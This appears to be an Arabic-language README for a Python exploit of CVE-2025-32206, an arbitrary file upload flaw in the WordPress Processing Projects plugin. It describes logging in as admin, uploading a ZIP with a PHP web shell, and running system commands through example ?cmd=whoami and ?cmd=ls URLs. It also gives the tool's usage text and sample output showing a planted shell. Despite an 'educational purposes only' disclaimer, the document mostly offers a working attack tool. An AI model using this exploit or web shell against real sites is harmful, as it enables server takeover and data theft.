
إضافة Processing Projects لووردبريس <= 1.0.2 معرضة لثغرة رفع الملفات التعسفي
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"ثغرة رفع ملفات غير مقيد من نوع خطير في إضافة LABCAT Processing Projects تتيح للمهاجمين رفع Web Shell إلى خادم الويب، مما قد يؤدي إلى اختراق كامل للنظام."
يستهدف هذا السكربت الاستغلالي المكتوب بلغة Python مواقع ووردبريس التي تستخدم إضافة Processing Projects المعرضة للثغرة (الإصدار <= 1.0.2). تتعامل الإضافة بشكل غير سليم مع رفع الملفات من المستخدمين الموثقين، مما يسمح لهم برفع ملفات ZIP عشوائية تتضمن أكواد PHP قابلة للتنفيذ (Web Shell).
يقوم السكربت الاستغلالي بما يلي:
Nxploited.zip) يحتوي على شل PHP خبيث (Nxploit.php).http://target.com/wp-content/uploads/processing-projects/Nxploit.phpبمجرد رفع الشل بنجاح، يمكن استخدامه لتنفيذ أوامر النظام عبر معامل cmd. أمثلة:
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=whoami
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=ls
ينفذ هذا الشل أوامر نظام تشغيل عشوائية ويعيد مخرجاتها مباشرة في الاستجابة.
usage: CVE-2025-32206.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for CVE-2025-32206 | By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g. http://target.com/wordpress)
-un, --username USERNAME WordPress admin username
-p, --password PASSWORD WordPress admin password
[+] CVE-2025-32206 | WordPress Processing Projects <= 1.0.2 - Arbitrary File Upload
[+] By Nxploited | Khaled Alenazi
[+] Created zip with shell: Nxploited.zip -> Nxploit.php
[+] Logged in successfully.
[+] Extracted form fields successfully.
[+] Upload request sent successfully.
[+] Shell executed at: http://target.com/wp-content/uploads/processing-projects/Nxploit.php
هذا السكربت مقدم لأغراض تعليمية فقط. الاستخدام غير المصرح به لهذا الاستغلال على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني وغير أخلاقي.
التزم دائمًا بممارسات الإفصاح المسؤول واستخدم هذه الأداة فقط في بيئات خاضعة للتحكم أو بتفويض صريح.
بواسطة: Nxploited | Khaled Alenazi